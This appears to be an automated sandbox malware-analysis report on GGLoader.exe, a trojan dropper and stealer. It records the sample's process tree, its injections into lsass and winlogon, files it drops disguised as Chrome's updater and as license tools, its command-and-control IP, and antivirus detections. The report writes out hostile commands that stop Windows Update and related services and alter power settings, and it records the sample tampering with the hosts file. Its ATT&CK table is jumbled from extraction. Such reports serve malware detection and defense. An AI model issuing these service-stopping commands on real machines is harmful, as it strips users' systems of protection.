                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C04CBB
                        Source: C:\Users\user\Desktop\GGLoader.exeQueries volume information: C:\Users\user\Desktop\GGLoader.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 42_2_0000000140001C64
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007A5A60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_007A5A60
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007946E0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 6_2_007946E0
                        Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: svcupdater.exe PID: 7904, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation
                        11
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        1
                        File and Directory Permissions Modification
                        1
                        Credential API Hooking
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Native API
                        1
                        Windows Service
                        11
                        DLL Side-Loading
                        21
                        Disable or Modify Tools
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol1
                        Credential API Hooking
                        21
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts22
                        Command and Scripting Interpreter
                        11
                        Scheduled Task/Job
                        1
                        Access Token Manipulation
                        21
                        Deobfuscate/Decode Files or Information
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares3
                        Clipboard Data
MITRE ATT&CK Matrix: the table layout was lost in extraction (cell contents of the matrix columns were concatenated and cannot be reliably separated). The technique names that survive as separate entries, each preceded by a hit count, are: Non-Application Layer Protocol, Scheduled Task/Job, Windows Service, Abuse Elevation Control Mechanism, System Information Discovery, Application Layer Protocol, Service Execution, Process Injection, Obfuscated Files or Information, Security Software Discovery, PowerShell, DLL Side-Loading, Process Discovery, File Deletion, Virtualization/Sandbox Evasion, Rootkit, Application Window Discovery, Masquerading, System Owner/User Discovery, Modify Registry, Remote System Discovery, Access Token Manipulation, Hidden Files and Directories.
Behavior Graph ID: 1526110 | Sample: GGLoader.exe | Startdate: 04/10/2024 | Architecture: WINDOWS | Score: 100

The graph image did not survive extraction; its nodes and edges are listed below, grouped by process. Numbers in brackets are the counts shown on the process node (created registry values / files).

Start
  • DNS/IP: bitbucket.org
  • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 25 other signatures
  • Started: GGLoader.exe [2]; powershell.exe; cmd.exe; 5 other processes

GGLoader.exe [2]
  • Dropped: C:\Users\user\AppData\...\GGLoader.exe.log (CSV)
  • Signatures: Encrypted powershell cmdline option found; Binary or sample is protected by dotNetProtector; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  • Started: powershell.exe [14 27]

powershell.exe (started from Start)
  • Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
  • Started: dllhost.exe; conhost.exe

cmd.exe
  • Signatures: Uses cmd line tools excessively to alter registry or file data; Uses powercfg.exe to modify the power settings; Stops critical windows services
  • Started: conhost.exe; 10 other processes

5 other processes (started from Start)
  • DNS/IP: 45.159.189.105 (ports 49739, 49740, 50007), HOSTING-SOLUTIONSUS, Netherlands
  • Signatures: Antivirus detection for dropped file; Loading BitLocker PowerShell Module; Modifies power options to not sleep / hibernate
  • Started: conhost.exe (three instances); 5 other processes

powershell.exe [14 27] (started by GGLoader.exe)
  • DNS/IP: bitbucket.org 185.166.143.49 (ports 443, 49730, 49731), AMAZON-02US, Germany
  • Dropped: C:\Users\user\AppData\...\LicenseGet.exe (PE32); C:\Users\user\AppData\Local\...\LicSend.exe (PE32+); C:\Users\user\AppData\Local\...\LicCheck.exe (PE32)
  • Signatures: Potential dropper URLs found in powershell memory; Loading BitLocker PowerShell Module; Powershell drops PE file
  • Started: LicSend.exe [2]; LicCheck.exe [3]; powershell.exe [15]; conhost.exe

dllhost.exe
  • Signatures: Found stalling execution ending in API Sleep call; Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; 4 other signatures
  • Injected: winlogon.exe; lsass.exe; svchost.exe; 12 other processes

LicSend.exe [2]
  • Dropped: C:\Users\user\AppData\Local\...\poduiwcd.tmp (PE32+); C:\Program Files\Google\Chrome\updater.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
  • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Suspicious powershell command line found; 7 other signatures
  • Started: dialer.exe

LicCheck.exe [3]
  • Dropped: C:\Users\user\AppData\...\svcupdater.exe (PE32)
  • Signatures: Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; Drops large PE files
  • Started: schtasks.exe

powershell.exe [15] (started by powershell.exe [14 27])
  • Started: conhost.exe

schtasks.exe
  • Started: conhost.exe

Source | Detection | Scanner | Label
GGLoader.exe | 76% | ReversingLabs | Win32.Trojan.MarsStealer
GGLoader.exe | 100% | Avira | TR/Dropper.Gen
GGLoader.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files\Google\Chrome\updater.exe | 100% | Avira | HEUR/AGEN.1325648
C:\Users\user\AppData\Local\Temp\LicCheck.exe | 100% | Avira | HEUR/AGEN.1317771
C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | 100% | Avira | HEUR/AGEN.1319806
C:\Users\user\AppData\Local\Temp\LicSend.exe | 100% | Avira | HEUR/AGEN.1325648
C:\Program Files\Google\Chrome\updater.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\LicCheck.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\LicenseGet.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\poduiwcd.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\LicSend.exe | 100% | Joe Sandbox ML |
C:\Program Files\Google\Chrome\updater.exe | 79% | ReversingLabs | Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Temp\LicCheck.exe | 79% | ReversingLabs | Win32.Trojan.RealProtect
C:\Users\user\AppData\Local\Temp\LicSend.exe | 79% | ReversingLabs | Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Temp\poduiwcd.tmp | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                        No Antivirus matches
Source | Detection | Scanner | Label
http://crl.microsoft | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
